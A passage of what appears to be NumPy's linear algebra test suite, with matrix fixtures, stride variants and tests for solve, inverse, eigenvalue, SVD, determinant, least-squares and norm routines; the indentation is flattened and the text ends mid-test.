def get_complex_dtype(dtype):
return {single: csingle, double: cdouble,
csingle: csingle, cdouble: cdouble}[dtype]
def get_rtol(dtype):
# Choose a safe rtol
if dtype in (single, csingle):
return 1e-5
else:
return 1e-11
class LinalgCase(object):
def __init__(self, name, a, b, exception_cls=None):
assert isinstance(name, str)
self.name = name
self.a = a
self.b = b
self.exception_cls = exception_cls
def check(self, do):
if self.exception_cls is None:
do(self.a, self.b)
else:
assert_raises(self.exception_cls, do, self.a, self.b)
def __repr__(self):
return "<LinalgCase: %s>" % (self.name,)
np.random.seed(1234)
SQUARE_CASES = [
LinalgCase("single",
array([[1., 2.], [3., 4.]], dtype=single),
array([2., 1.], dtype=single)),
LinalgCase("double",
array([[1., 2.], [3., 4.]], dtype=double),
array([2., 1.], dtype=double)),
LinalgCase("double_2",
array([[1., 2.], [3., 4.]], dtype=double),
array([[2., 1., 4.], [3., 4., 6.]], dtype=double)),
LinalgCase("csingle",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=csingle),
array([2.+1j, 1.+2j], dtype=csingle)),
LinalgCase("cdouble",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=cdouble),
array([2.+1j, 1.+2j], dtype=cdouble)),
LinalgCase("cdouble_2",
array([[1.+2j, 2+3j], [3+4j, 4+5j]], dtype=cdouble),
array([[2.+1j, 1.+2j, 1+3j], [1-2j, 1-3j, 1-6j]], dtype=cdouble)),
LinalgCase("empty",
               atleast_2d(array([], dtype=double)),
               atleast_2d(array([], dtype=double)),
linalg.LinAlgError),
LinalgCase("8x8",
np.random.rand(8, 8),
np.random.rand(8)),
LinalgCase("1x1",
np.random.rand(1, 1),
np.random.rand(1)),
LinalgCase("nonarray",
[[1, 2], [3, 4]],
[2, 1]),
LinalgCase("matrix_b_only",
array([[1., 2.], [3., 4.]]),
matrix([2., 1.]).T),
LinalgCase("matrix_a_and_b",
matrix([[1., 2.], [3., 4.]]),
matrix([2., 1.]).T),
]
NONSQUARE_CASES = [
LinalgCase("single_nsq_1",
array([[1., 2., 3.], [3., 4., 6.]], dtype=single),
array([2., 1.], dtype=single)),
LinalgCase("single_nsq_2",
array([[1., 2.], [3., 4.], [5., 6.]], dtype=single),
array([2., 1., 3.], dtype=single)),
LinalgCase("double_nsq_1",
array([[1., 2., 3.], [3., 4., 6.]], dtype=double),
array([2., 1.], dtype=double)),
LinalgCase("double_nsq_2",
array([[1., 2.], [3., 4.], [5., 6.]], dtype=double),
array([2., 1., 3.], dtype=double)),
LinalgCase("csingle_nsq_1",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=csingle),
array([2.+1j, 1.+2j], dtype=csingle)),
LinalgCase("csingle_nsq_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=csingle),
array([2.+1j, 1.+2j, 3.-3j], dtype=csingle)),
LinalgCase("cdouble_nsq_1",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=cdouble),
array([2.+1j, 1.+2j], dtype=cdouble)),
LinalgCase("cdouble_nsq_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=cdouble),
array([2.+1j, 1.+2j, 3.-3j], dtype=cdouble)),
LinalgCase("cdouble_nsq_1_2",
array([[1.+1j, 2.+2j, 3.-3j], [3.-5j, 4.+9j, 6.+2j]], dtype=cdouble),
array([[2.+1j, 1.+2j], [1-1j, 2-2j]], dtype=cdouble)),
LinalgCase("cdouble_nsq_2_2",
array([[1.+1j, 2.+2j], [3.-3j, 4.-9j], [5.-4j, 6.+8j]], dtype=cdouble),
array([[2.+1j, 1.+2j], [1-1j, 2-2j], [1-1j, 2-2j]], dtype=cdouble)),
LinalgCase("8x11",
np.random.rand(8, 11),
np.random.rand(11)),
LinalgCase("1x5",
np.random.rand(1, 5),
np.random.rand(5)),
LinalgCase("5x1",
np.random.rand(5, 1),
np.random.rand(1)),
]
HERMITIAN_CASES = [
LinalgCase("hsingle",
array([[1., 2.], [2., 1.]], dtype=single),
None),
LinalgCase("hdouble",
array([[1., 2.], [2., 1.]], dtype=double),
None),
LinalgCase("hcsingle",
array([[1., 2+3j], [2-3j, 1]], dtype=csingle),
None),
LinalgCase("hcdouble",
array([[1., 2+3j], [2-3j, 1]], dtype=cdouble),
None),
LinalgCase("hempty",
               atleast_2d(array([], dtype=double)),
None,
linalg.LinAlgError),
LinalgCase("hnonarray",
[[1, 2], [2, 1]],
None),
LinalgCase("matrix_b_only",
array([[1., 2.], [2., 1.]]),
None),
LinalgCase("hmatrix_a_and_b",
matrix([[1., 2.], [2., 1.]]),
None),
LinalgCase("hmatrix_1x1",
np.random.rand(1, 1),
None),
]
GENERALIZED_SQUARE_CASES = []
GENERALIZED_NONSQUARE_CASES = []
GENERALIZED_HERMITIAN_CASES = []
for tgt, src in ((GENERALIZED_SQUARE_CASES, SQUARE_CASES),
(GENERALIZED_NONSQUARE_CASES, NONSQUARE_CASES),
(GENERALIZED_HERMITIAN_CASES, HERMITIAN_CASES)):
for case in src:
if not isinstance(case.a, np.ndarray):
continue
a = np.array([case.a, 2*case.a, 3*case.a])
if case.b is None:
b = None
else:
b = np.array([case.b, 7*case.b, 6*case.b])
new_case = LinalgCase(case.name + "_tile3", a, b,
case.exception_cls)
tgt.append(new_case)
a = np.array([case.a]*2*3).reshape((3, 2) + case.a.shape)
if case.b is None:
b = None
else:
b = np.array([case.b]*2*3).reshape((3, 2) + case.b.shape)
new_case = LinalgCase(case.name + "_tile213", a, b,
case.exception_cls)
tgt.append(new_case)
def _stride_comb_iter(x):
"""
Generate cartesian product of strides for all axes
"""
if not isinstance(x, np.ndarray):
yield x, "nop"
return
stride_set = [(1,)]*x.ndim
stride_set[-1] = (1, 3, -4)
if x.ndim > 1:
stride_set[-2] = (1, 3, -4)
if x.ndim > 2:
stride_set[-3] = (1, -4)
for repeats in itertools.product(*tuple(stride_set)):
new_shape = [abs(a*b) for a, b in zip(x.shape, repeats)]
slices = tuple([slice(None, None, repeat) for repeat in repeats])
# new array with different strides, but same data
xi = np.empty(new_shape, dtype=x.dtype)
xi.view(np.uint32).fill(0xdeadbeef)
xi = xi[slices]
xi[...] = x
xi = xi.view(x.__class__)
assert np.all(xi == x)
yield xi, "stride_" + "_".join(["%+d" % j for j in repeats])
# generate also zero strides if possible
if x.ndim >= 1 and x.shape[-1] == 1:
s = list(x.strides)
s[-1] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0"
if x.ndim >= 2 and x.shape[-2] == 1:
s = list(x.strides)
s[-2] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0_x"
    if x.ndim >= 2 and x.shape[-2:] == (1, 1):
s = list(x.strides)
s[-1] = 0
s[-2] = 0
xi = np.lib.stride_tricks.as_strided(x, strides=s)
yield xi, "stride_xxx_0_0"
for src in (SQUARE_CASES,
NONSQUARE_CASES,
HERMITIAN_CASES,
GENERALIZED_SQUARE_CASES,
GENERALIZED_NONSQUARE_CASES,
GENERALIZED_HERMITIAN_CASES):
new_cases = []
for case in src:
for a, a_tag in _stride_comb_iter(case.a):
for b, b_tag in _stride_comb_iter(case.b):
new_case = LinalgCase(case.name + "_" + a_tag + "_" + b_tag, a, b,
exception_cls=case.exception_cls)
new_cases.append(new_case)
src.extend(new_cases)
def _check_cases(func, cases):
for case in cases:
try:
case.check(func)
except Exception:
msg = "In test case: %r\n\n" % case
msg += traceback.format_exc()
raise AssertionError(msg)
class LinalgTestCase(object):
def test_sq_cases(self):
_check_cases(self.do, SQUARE_CASES)
class LinalgNonsquareTestCase(object):
    def test_nonsq_cases(self):
_check_cases(self.do, NONSQUARE_CASES)
class LinalgGeneralizedTestCase(object):
@dec.slow
def test_generalized_sq_cases(self):
_check_cases(self.do, GENERALIZED_SQUARE_CASES)
class LinalgGeneralizedNonsquareTestCase(object):
@dec.slow
def test_generalized_nonsq_cases(self):
_check_cases(self.do, GENERALIZED_NONSQUARE_CASES)
class HermitianTestCase(object):
def test_herm_cases(self):
_check_cases(self.do, HERMITIAN_CASES)
class HermitianGeneralizedTestCase(object):
@dec.slow
def test_generalized_herm_cases(self):
_check_cases(self.do, GENERALIZED_HERMITIAN_CASES)
def dot_generalized(a, b):
a = asarray(a)
if a.ndim >= 3:
if a.ndim == b.ndim:
# matrix x matrix
new_shape = a.shape[:-1] + b.shape[-1:]
elif a.ndim == b.ndim + 1:
# matrix x vector
new_shape = a.shape[:-1]
else:
raise ValueError("Not implemented...")
r = np.empty(new_shape, dtype=np.common_type(a, b))
for c in itertools.product(*map(range, a.shape[:-2])):
r[c] = dot(a[c], b[c])
return r
else:
return dot(a, b)
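# Broadcasting rule implemented above, by example: with a.shape == (3, 2, 4, 5)
# and b.shape == (3, 2, 5, 6), the loop runs over the leading (3, 2) index and
# multiplies each 4x5 block with the matching 5x6 one, giving a (3, 2, 4, 6)
# result; in the matrix-times-vector case (a.ndim == b.ndim + 1) the trailing
# dimension of b is consumed instead.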
def identity_like_generalized(a):
a = asarray(a)
if a.ndim >= 3:
r = np.empty(a.shape, dtype=a.dtype)
for c in itertools.product(*map(range, a.shape[:-2])):
r[c] = identity(a.shape[-2])
return r
else:
return identity(a.shape[0])
class TestSolve(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
x = linalg.solve(a, b)
assert_almost_equal(b, dot_generalized(a, x))
assert_(imply(isinstance(b, matrix), isinstance(x, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.solve(x, x).dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_0_size(self):
class ArraySubclass(np.ndarray):
pass
# Test system of 0x0 matrices
a = np.arange(8).reshape(2, 2, 2)
b = np.arange(6).reshape(1, 2, 3).view(ArraySubclass)
expected = linalg.solve(a, b)[:, 0:0,:]
result = linalg.solve(a[:, 0:0, 0:0], b[:, 0:0,:])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
# Test errors for non-square and only b's dimension being 0
assert_raises(linalg.LinAlgError, linalg.solve, a[:, 0:0, 0:1], b)
assert_raises(ValueError, linalg.solve, a, b[:, 0:0,:])
# Test broadcasting error
b = np.arange(6).reshape(1, 3, 2) # broadcasting error
assert_raises(ValueError, linalg.solve, a, b)
assert_raises(ValueError, linalg.solve, a[0:0], b[0:0])
# Test zero "single equations" with 0x0 matrices.
b = np.arange(2).reshape(1, 2).view(ArraySubclass)
expected = linalg.solve(a, b)[:, 0:0]
result = linalg.solve(a[:, 0:0, 0:0], b[:, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
b = np.arange(3).reshape(1, 3)
assert_raises(ValueError, linalg.solve, a, b)
assert_raises(ValueError, linalg.solve, a[0:0], b[0:0])
assert_raises(ValueError, linalg.solve, a[:, 0:0, 0:0], b)
def test_0_size_k(self):
# test zero multiple equation (K=0) case.
class ArraySubclass(np.ndarray):
pass
a = np.arange(4).reshape(1, 2, 2)
b = np.arange(6).reshape(3, 2, 1).view(ArraySubclass)
expected = linalg.solve(a, b)[:,:, 0:0]
result = linalg.solve(a, b[:,:, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
# test both zero.
expected = linalg.solve(a, b)[:, 0:0, 0:0]
result = linalg.solve(a[:, 0:0, 0:0], b[:,0:0, 0:0])
assert_array_equal(result, expected)
assert_(isinstance(result, ArraySubclass))
class TestInv(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
a_inv = linalg.inv(a)
assert_almost_equal(dot_generalized(a, a_inv),
identity_like_generalized(a))
assert_(imply(isinstance(a, matrix), isinstance(a_inv, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.inv(x).dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_0_size(self):
# Check that all kinds of 0-sized arrays work
class ArraySubclass(np.ndarray):
pass
a = np.zeros((0, 1, 1), dtype=np.int_).view(ArraySubclass)
res = linalg.inv(a)
assert_(res.dtype.type is np.float64)
assert_equal(a.shape, res.shape)
        assert_(isinstance(res, ArraySubclass))
a = np.zeros((0, 0), dtype=np.complex64).view(ArraySubclass)
res = linalg.inv(a)
assert_(res.dtype.type is np.complex64)
assert_equal(a.shape, res.shape)
class TestEigvals(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
ev = linalg.eigvals(a)
evalues, evectors = linalg.eig(a)
assert_almost_equal(ev, evalues)
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(linalg.eigvals(x).dtype, dtype)
x = np.array([[1, 0.5], [-1, 1]], dtype=dtype)
assert_equal(linalg.eigvals(x).dtype, get_complex_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestEig(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
evalues, evectors = linalg.eig(a)
assert_allclose(dot_generalized(a, evectors),
np.asarray(evectors) * np.asarray(evalues)[...,None,:],
rtol=get_rtol(evalues.dtype))
assert_(imply(isinstance(a, matrix), isinstance(evectors, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w, v = np.linalg.eig(x)
assert_equal(w.dtype, dtype)
assert_equal(v.dtype, dtype)
x = np.array([[1, 0.5], [-1, 1]], dtype=dtype)
w, v = np.linalg.eig(x)
assert_equal(w.dtype, get_complex_dtype(dtype))
assert_equal(v.dtype, get_complex_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestSVD(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
u, s, vt = linalg.svd(a, 0)
assert_allclose(a, dot_generalized(np.asarray(u) * np.asarray(s)[...,None,:],
np.asarray(vt)),
rtol=get_rtol(u.dtype))
assert_(imply(isinstance(a, matrix), isinstance(u, matrix)))
assert_(imply(isinstance(a, matrix), isinstance(vt, matrix)))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
u, s, vh = linalg.svd(x)
assert_equal(u.dtype, dtype)
assert_equal(s.dtype, get_real_dtype(dtype))
assert_equal(vh.dtype, dtype)
s = linalg.svd(x, compute_uv=False)
assert_equal(s.dtype, get_real_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestCondSVD(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
c = asarray(a) # a might be a matrix
s = linalg.svd(c, compute_uv=False)
old_assert_almost_equal(s[0]/s[-1], linalg.cond(a), decimal=5)
class TestCond2(LinalgTestCase):
def do(self, a, b):
c = asarray(a) # a might be a matrix
s = linalg.svd(c, compute_uv=False)
old_assert_almost_equal(s[0]/s[-1], linalg.cond(a, 2), decimal=5)
class TestCondInf(object):
def test(self):
A = array([[1., 0, 0], [0, -2., 0], [0, 0, 3.]])
assert_almost_equal(linalg.cond(A, inf), 3.)
class TestPinv(LinalgTestCase):
def do(self, a, b):
a_ginv = linalg.pinv(a)
assert_almost_equal(dot(a, a_ginv), identity(asarray(a).shape[0]))
assert_(imply(isinstance(a, matrix), isinstance(a_ginv, matrix)))
class TestDet(LinalgTestCase, LinalgGeneralizedTestCase):
def do(self, a, b):
d = linalg.det(a)
(s, ld) = linalg.slogdet(a)
if asarray(a).dtype.type in (single, double):
ad = asarray(a).astype(double)
else:
ad = asarray(a).astype(cdouble)
ev = linalg.eigvals(ad)
assert_almost_equal(d, multiply.reduce(ev, axis=-1))
assert_almost_equal(s * np.exp(ld), multiply.reduce(ev, axis=-1))
s = np.atleast_1d(s)
ld = np.atleast_1d(ld)
m = (s != 0)
assert_almost_equal(np.abs(s[m]), 1)
assert_equal(ld[~m], -inf)
def test_zero(self):
assert_equal(linalg.det([[0.0]]), 0.0)
assert_equal(type(linalg.det([[0.0]])), double)
assert_equal(linalg.det([[0.0j]]), 0.0)
assert_equal(type(linalg.det([[0.0j]])), cdouble)
assert_equal(linalg.slogdet([[0.0]]), (0.0, -inf))
assert_equal(type(linalg.slogdet([[0.0]])[0]), double)
assert_equal(type(linalg.slogdet([[0.0]])[1]), double)
assert_equal(linalg.slogdet([[0.0j]]), (0.0j, -inf))
assert_equal(type(linalg.slogdet([[0.0j]])[0]), cdouble)
assert_equal(type(linalg.slogdet([[0.0j]])[1]), double)
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
assert_equal(np.linalg.det(x).dtype, dtype)
ph, s = np.linalg.slogdet(x)
assert_equal(s.dtype, get_real_dtype(dtype))
assert_equal(ph.dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
class TestLstsq(LinalgTestCase, LinalgNonsquareTestCase):
def do(self, a, b):
arr = np.asarray(a)
m, n = arr.shape
u, s, vt = linalg.svd(a, 0)
x, residuals, rank, sv = linalg.lstsq(a, b)
if m <= n:
assert_almost_equal(b, dot(a, x))
assert_equal(rank, m)
else:
assert_equal(rank, n)
assert_almost_equal(sv, sv.__array_wrap__(s))
if rank == n and m > n:
expect_resids = (np.asarray(abs(np.dot(a, x) - b))**2).sum(axis=0)
expect_resids = np.asarray(expect_resids)
if len(np.asarray(b).shape) == 1:
expect_resids.shape = (1,)
assert_equal(residuals.shape, expect_resids.shape)
else:
expect_resids = np.array([]).view(type(x))
assert_almost_equal(residuals, expect_resids)
assert_(np.issubdtype(residuals.dtype, np.floating))
assert_(imply(isinstance(b, matrix), isinstance(x, matrix)))
assert_(imply(isinstance(b, matrix), isinstance(residuals, matrix)))
class TestMatrixPower(object):
R90 = array([[0, 1], [-1, 0]])
Arb22 = array([[4, -7], [-2, 10]])
noninv = array([[1, 0], [0, 0]])
arbfloat = array([[0.1, 3.2], [1.2, 0.7]])
large = identity(10)
t = large[1,:].copy()
large[1,:] = large[0,:]
large[0,:] = t
def test_large_power(self):
assert_equal(matrix_power(self.R90, 2**100+2**10+2**5+1), self.R90)
def test_large_power_trailing_zero(self):
assert_equal(matrix_power(self.R90, 2**100+2**10+2**5), identity(2))
def testip_zero(self):
def tz(M):
mz = matrix_power(M, 0)
assert_equal(mz, identity(M.shape[0]))
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_one(self):
def tz(M):
mz = matrix_power(M, 1)
assert_equal(mz, M)
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_two(self):
def tz(M):
mz = matrix_power(M, 2)
assert_equal(mz, dot(M, M))
assert_equal(mz.dtype, M.dtype)
for M in [self.Arb22, self.arbfloat, self.large]:
yield tz, M
def testip_invert(self):
def tz(M):
mz = matrix_power(M, -1)
assert_almost_equal(identity(M.shape[0]), dot(mz, M))
for M in [self.R90, self.Arb22, self.arbfloat, self.large]:
yield tz, M
def test_invert_noninvertible(self):
import numpy.linalg
assert_raises(numpy.linalg.linalg.LinAlgError,
lambda: matrix_power(self.noninv, -1))
class TestBoolPower(object):
def test_square(self):
A = array([[True, False], [True, True]])
assert_equal(matrix_power(A, 2), A)
class TestEigvalsh(HermitianTestCase, HermitianGeneralizedTestCase):
def do(self, a, b):
# note that eigenvalue arrays returned by eig must be sorted since
# their order isn't guaranteed.
ev = linalg.eigvalsh(a, 'L')
evalues, evectors = linalg.eig(a)
evalues.sort(axis=-1)
assert_allclose(ev, evalues, rtol=get_rtol(ev.dtype))
ev2 = linalg.eigvalsh(a, 'U')
assert_allclose(ev2, evalues, rtol=get_rtol(ev.dtype))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w = np.linalg.eigvalsh(x)
assert_equal(w.dtype, get_real_dtype(dtype))
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_invalid(self):
x = np.array([[1, 0.5], [0.5, 1]], dtype=np.float32)
assert_raises(ValueError, np.linalg.eigvalsh, x, UPLO="lrong")
assert_raises(ValueError, np.linalg.eigvalsh, x, "lower")
assert_raises(ValueError, np.linalg.eigvalsh, x, "upper")
def test_UPLO(self):
Klo = np.array([[0, 0],[1, 0]], dtype=np.double)
Kup = np.array([[0, 1],[0, 0]], dtype=np.double)
tgt = np.array([-1, 1], dtype=np.double)
rtol = get_rtol(np.double)
# Check default is 'L'
w = np.linalg.eigvalsh(Klo)
assert_allclose(w, tgt, rtol=rtol)
# Check 'L'
w = np.linalg.eigvalsh(Klo, UPLO='L')
assert_allclose(w, tgt, rtol=rtol)
# Check 'l'
w = np.linalg.eigvalsh(Klo, UPLO='l')
assert_allclose(w, tgt, rtol=rtol)
# Check 'U'
w = np.linalg.eigvalsh(Kup, UPLO='U')
assert_allclose(w, tgt, rtol=rtol)
# Check 'u'
w = np.linalg.eigvalsh(Kup, UPLO='u')
assert_allclose(w, tgt, rtol=rtol)
class TestEigh(HermitianTestCase, HermitianGeneralizedTestCase):
def do(self, a, b):
# note that eigenvalue arrays returned by eig must be sorted since
# their order isn't guaranteed.
ev, evc = linalg.eigh(a)
evalues, evectors = linalg.eig(a)
evalues.sort(axis=-1)
assert_almost_equal(ev, evalues)
assert_allclose(dot_generalized(a, evc),
np.asarray(ev)[...,None,:] * np.asarray(evc),
rtol=get_rtol(ev.dtype))
ev2, evc2 = linalg.eigh(a, 'U')
assert_almost_equal(ev2, evalues)
assert_allclose(dot_generalized(a, evc2),
np.asarray(ev2)[...,None,:] * np.asarray(evc2),
rtol=get_rtol(ev.dtype), err_msg=repr(a))
def test_types(self):
def check(dtype):
x = np.array([[1, 0.5], [0.5, 1]], dtype=dtype)
w, v = np.linalg.eigh(x)
assert_equal(w.dtype, get_real_dtype(dtype))
assert_equal(v.dtype, dtype)
for dtype in [single, double, csingle, cdouble]:
yield check, dtype
def test_invalid(self):
x = np.array([[1, 0.5], [0.5, 1]], dtype=np.float32)
assert_raises(ValueError, np.linalg.eigh, x, UPLO="lrong")
assert_raises(ValueError, np.linalg.eigh, x, "lower")
assert_raises(ValueError, np.linalg.eigh, x, "upper")
def test_UPLO(self):
Klo = np.array([[0, 0],[1, 0]], dtype=np.double)
Kup = np.array([[0, 1],[0, 0]], dtype=np.double)
tgt = np.array([-1, 1], dtype=np.double)
rtol = get_rtol(np.double)
# Check default is 'L'
w, v = np.linalg.eigh(Klo)
assert_allclose(w, tgt, rtol=rtol)
# Check 'L'
w, v = np.linalg.eigh(Klo, UPLO='L')
assert_allclose(w, tgt, rtol=rtol)
# Check 'l'
w, v = np.linalg.eigh(Klo, UPLO='l')
assert_allclose(w, tgt, rtol=rtol)
# Check 'U'
w, v = np.linalg.eigh(Kup, UPLO='U')
assert_allclose(w, tgt, rtol=rtol)
# Check 'u'
w, v = np.linalg.eigh(Kup, UPLO='u')
assert_allclose(w, tgt, rtol=rtol)
class _TestNorm(object):
dt = None
dec = None
def test_empty(self):
assert_equal(norm([]), 0.0)
assert_equal(norm(array([], dtype=self.dt)), 0.0)
assert_equal(norm(atleast_2d(array([], dtype=self.dt))), 0.0)
def test_vector(self):
a = [1, 2, 3, 4]
b = [-1, -2, -3, -4]
c = [-1, 2, -3, 4]
def _test(v):
np.testing.assert_almost_equal(norm(v), 30**0.5,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, inf), 4.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -inf), 1.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 1), 10.0,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -1), 12.0/25,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 2), 30**0.5,
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, -2), ((205./144)**-0.5),
decimal=self.dec)
np.testing.assert_almost_equal(norm(v, 0), 4,
decimal=self.dec)
for v in (a, b, c,):
_test(v)
for v in (array(a, dtype=self.dt), array(b, dtype=self.dt),
array(c, dtype=self.dt)):
_test(v)
def test_matrix_2x2(self):
A = matrix([[1, 3], [5, 7]], dtype=self.dt)
assert_almost_equal(norm(A), 84**0.5)
assert_almost_equal(norm(A, 'fro'), 84**0.5)
assert_almost_equal(norm(A, 'nuc'), 10.0)
assert_almost_equal(norm(A, inf), 12.0)
assert_almost_equal(norm(A, -inf), 4.0)
assert_almost_equal(norm(A, 1), 10.0)
assert_almost_equal(norm(A, -1), 6.0)
assert_almost_equal(norm(A, 2), 9.1231056256176615)
assert_almost_equal(norm(A, -2), 0.87689437438234041)
assert_raises(ValueError, norm, A, 'nofro')
assert_raises(ValueError, norm, A, -3)
assert_raises(ValueError, norm, A, 0)
def test_matrix_3x3(self):
# This test has been added because the 2x2 example
# happened to have equal nuclear norm and induced 1-norm.
# The 1/10 scaling factor accommodates the absolute tolerance
# used in assert_almost_equal.
A = (1/10) * np.array([[1, 2, 3], [6, 0, 5], [3, 2, 1]], dtype=self.dt)
assert_almost_equal(norm(A), (1/10) * 89**0.5)
assert_almost_equal(norm(A, 'fro'), (1/10) * 89**0.5)
assert_almost_equal(norm(A, 'nuc'), 1.3366836911774836)
assert_almost_equal(norm(A, inf), 1.1)
assert_almost_equal(norm(A, -inf), 0.6)
assert_almost_equal(norm(A, 1), 1.0)
assert_almost_equal(norm(A, -1), 0.4)
assert_almost_equal(norm(A, 2), 0.88722940323461277)
assert_almost_equal(norm(A, -2), 0.19456584790481812)
def test_axis(self):
# Vector norms.
# Compare the use of `axis` with computing the norm of each row
# or column separately.
A = array([[1, 2, 3], [4, 5, 6]], dtype=self.dt)
for order in [None, -1, 0, 1, 2, 3, np.Inf, -np.Inf]:
expected0 = [norm(A[:, k], ord=order) for k in range(A.shape[1])]
assert_almost_equal(norm(A, ord=order, axis=0), expected0)
expected1 = [norm(A[k,:], ord=order) for k in range(A.shape[0])]
assert_almost_equal(norm(A, ord=order, axis=1), expected1)
# Matrix norms.
B = np.arange(1, 25, dtype=self.dt).reshape(2, 3, 4)
nd = B.ndim
for order in [None, -2, 2, -1, 1, np.Inf, -np.Inf, 'fro']:
for axis in itertools.combinations(range(-nd, nd), 2):
row_axis, col_axis = axis
if row_axis < 0:
row_axis += nd
if col_axis < 0:
col_axis += nd
if row_axis == col_axis:
assert_raises(ValueError, norm, B, ord=order, axis=axis)
else:
n = norm(B, ord=order, axis=axis)
# The logic using k_index only works for nd = 3.
# This has to be changed if nd is increased.
k_index = nd - (row_axis + col_axis)
if row_axis < col_axis:
expected = [norm(B[:].take(k, axis=k_index), ord=order)
for k in range(B.shape[k_index])]
else:
expected = [norm(B[:].take(k, axis=k_index).T, ord=order)
for k in range(B.shape[k_index])]
assert_almost_equal(n, expected)
def test_keepdims(self):
A = np.arange(1,25, dtype=self.dt).reshape(2,3,4)
allclose_err = 'order {0}, axis = {1}'
shape_err = 'Shape mismatch found {0}, expected {1}, order={2}, axis={3}'
# check the order=None, axis=None case
expected = norm(A, ord=None, axis=None)
found = norm(A, ord=None, axis=None, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(None,None))
expected_shape = (1,1,1)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, None, None))
# Vector norms.
for order in [None, -1, 0, 1, 2, 3, np.Inf, -np.Inf]:
for k in range(A.ndim):
expected = norm(A, ord=order, axis=k)
found = norm(A, ord=order, axis=k, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(order,k))
expected_shape = list(A.shape)
expected_shape[k] = 1
expected_shape = tuple(expected_shape)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, order, k))
# Matrix norms.
for order in [None, -2, 2, -1, 1, np.Inf, -np.Inf, 'fro', 'nuc']:
for k in itertools.permutations(range(A.ndim), 2):
expected = norm(A, ord=order, axis=k)
found = norm(A, ord=order, axis=k, keepdims=True)
assert_allclose(np.squeeze(found), expected,
err_msg=allclose_err.format(order,k))
expected_shape = list(A.shape)
expected_shape[k[0]] = 1
expected_shape[k[1]] = 1
expected_shape = tuple(expected_shape)
assert_(found.shape == expected_shape,
shape_err.format(found.shape, expected_shape, order, k))
def test_bad_args(self):
# Check that bad arguments raise the appropriate exceptions.
A = array([[1, 2, 3], [4, 5, 6]], dtype=self.dt)
B = np.arange(1, 25, dtype=self.dt).reshape(2, 3, 4)
# Using `axis=<integer>` or passing in a 1-D array implies vector
# norms are being computed, so also using `ord='fro'`
# or `ord='nuc'` raises a ValueError.
assert_raises(ValueError, norm, A, 'fro', 0)
assert_raises(ValueError, norm, A, 'nuc', 0)
assert_raises(ValueError, norm, [3, 4], 'fro', None)
assert_raises(ValueError, norm, [3, 4], 'nuc', None)
# Similarly, norm should raise an exception when ord is any finite
# number other than 1, 2, -1 or -2 when computing matrix norms.
for order in [0, 3]:
assert_raises(ValueError, norm, A, order, None)
assert_raises(ValueError, norm, A, order, (0, 1))
assert_raises(ValueError, norm, B, order, (1, 2))
# Invalid axis
assert_raises(ValueError, norm, B, None, 3)
assert_raises(ValueError, norm, B, None, (2, 3))
assert_raises(ValueError, norm, B, None, (0, 1, 2))
class TestNorm_NonSystematic(object):
def test_longdouble_norm(self):
# Non-regression test: p-norm of longdouble would previously raise
# UnboundLocalError.
x = np.arange(10, dtype=np.longdouble)
old_assert_almost_equal(norm(x, ord=3), 12.65, decimal=2)
def test_intmin(self):
# Non-regression test: p-norm of signed integer would previously do
# float cast and abs in the wrong order.
x = np.array([-2 ** 31], dtype=np.int32)
old_assert_almost_equal(norm(x, ord=3), 2 ** 31, decimal=5)
def test_complex_high_ord(self):
# gh-4156
d = np.empty((2,), dtype=np.clongdouble)
d[0] = 6+7j
